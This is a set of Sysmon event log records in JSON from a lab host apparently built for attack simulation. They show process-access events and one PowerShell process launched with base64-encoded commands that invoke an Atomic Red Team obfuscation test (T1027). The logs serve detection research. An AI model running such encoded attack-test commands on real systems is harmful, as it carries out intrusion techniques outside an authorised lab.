{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.371\r\nProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nProcessId: 3064\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nParentProcessId: 2776\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.371","ProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","ParentProcessId":"2776","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nSourceProcessId: 2776\r\nSourceThreadId: 1064\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","SourceProcessId":"2776","SourceThreadId":"1064","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
